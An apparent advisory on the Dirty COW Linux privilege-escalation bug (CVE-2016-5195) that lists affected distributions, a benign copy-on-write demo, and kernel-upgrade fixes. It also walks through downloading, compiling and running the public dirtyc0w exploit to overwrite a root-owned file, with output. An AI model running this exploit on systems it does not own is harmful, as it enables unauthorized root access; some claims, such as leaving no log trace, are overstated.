A very serious security problem has been found in the Linux kernel: a 0-day local privilege escalation vulnerability that has existed for eleven years, since 2005 (since Linux kernel version 2.6.22+). The bug affects all sorts of Android and Linux kernels and can be used to escalate privileges. Any user can become root in seconds.
This bug is named Dirty COW (CVE-2016-5195). Exploiting it does not leave any trace of anything abnormal in the logs, so you cannot detect whether someone has exploited it against your server.
What is CVE-2016-5195 “Dirty COW” bug?
From the project site:
A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.
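The copy-on-write guarantee that this race condition breaks can be observed on any kernel with the short C program below. It is an added example, not code from the original article or from the Dirty COW project site. The temporary file path and the function name cow_keeps_file_intact() are assumptions made for the illustration.

```c
/* Added illustration of the COW guarantee for a private mapping.
 * The temp-file path and function name are constructed for this example. */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Returns 1 if a store through a MAP_PRIVATE mapping left the file
 * untouched (expected), 0 if the file changed, -1 on setup error. */
int cow_keeps_file_intact(void)
{
    char path[] = "/tmp/cow-demo-XXXXXX";
    const char orig[] = "this is indeed a test\n";
    char back[sizeof orig] = {0};
    size_t len = sizeof orig - 1;
    int result = -1;

    int fd = mkstemp(path);
    if (fd < 0) return -1;
    if (write(fd, orig, len) != (ssize_t)len) { close(fd); unlink(path); return -1; }
    close(fd);
    /* Reopen read-only: this descriptor can never write to the file. */
    fd = open(path, O_RDONLY);
    if (fd < 0) { unlink(path); return -1; }
    /* A private mapping may still be writable, because stores are meant
     * to land in a per-process copy of the page, never in the file. */
    char *map = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
    if (map != MAP_FAILED) {
        memset(map, 'm', len - 1);          /* first store triggers the COW fault */
        int copy_changed = (map[0] == 'm'); /* our private copy sees the write */
        if (pread(fd, back, len, 0) == (ssize_t)len)
            result = copy_changed && memcmp(back, orig, len) == 0;
        munmap(map, len);
    }
    close(fd);
    unlink(path);
    return result;
}

int main(void)
{
    int r = cow_keeps_file_intact();
    printf("file intact after private write: %s\n",
           r == 1 ? "yes" : r == 0 ? "NO" : "error");
    return r == 1 ? 0 : 1;
}
```

On a correctly behaving kernel the store only changes the process's private copy. Dirty COW is a race in which such a write could reach the underlying read-only mapping instead.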
Here is a list of affected Linux distros (including VMs and containers that share the same kernel):
- Red Hat Enterprise Linux 7.x
- Red Hat Enterprise Linux 6.x
- Red Hat Enterprise Linux 5.x
- CentOS Linux 7.x
- CentOS Linux 6.x
- CentOS Linux 5.x
- Debian Linux wheezy
- Debian Linux jessie
- Debian Linux stretch
- Debian Linux sid
- Ubuntu Linux precise (LTS 12.04)
- Ubuntu Linux trusty
- Ubuntu Linux xenial (LTS 16.04)
- Ubuntu Linux yakkety
- Ubuntu Linux vivid/ubuntu-core
- SUSE Linux Enterprise 11 and 12.
How can I verify CVE-2016-5195 on Linux?
For RHEL/CentOS Linux, use the following script:
    $ wget https://access.redhat.com/sites/default/files/rh-cve-2016-5195_2.sh
    $ bash rh-cve-2016-5195_2.sh
    Your kernel is 3.10.0-123.el7.x86_64 which IS vulnerable.
    Red Hat recommends that you update your kernel. Alternatively, you can apply partial
    mitigation described at https://access.redhat.com/security/vulnerabilities/2706661 .
For all other distributions, try running the proof-of-concept exploit code. Follow these steps:
    $ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
    $ gcc -lpthread dirtyc0w.c -o dirtyc0w
Then let’s create a file owned by root, which a normal user cannot write to:
    $ echo this is indeed a test | sudo tee linux.plus
    $ cat linux.plus
    this is indeed a test
Now let’s start the exploitation. Run the command as a normal user:
    $ ./dirtyc0w linux.plus m00000000000000000
    mmap 7f45f50bd000
    madvise 0
    procselfmem 1800000000
If the exploit succeeds, the file we created with privileged permission will have been overwritten, as below:
    $ cat linux.plus
    m00000000000000000
How to fix CVE-2016-5195 on Linux?
Upgrade the kernel, and don’t forget to reboot. When the system update is finished, you can run the rh-cve-2016-5195_2.sh script again to confirm that everything is fine.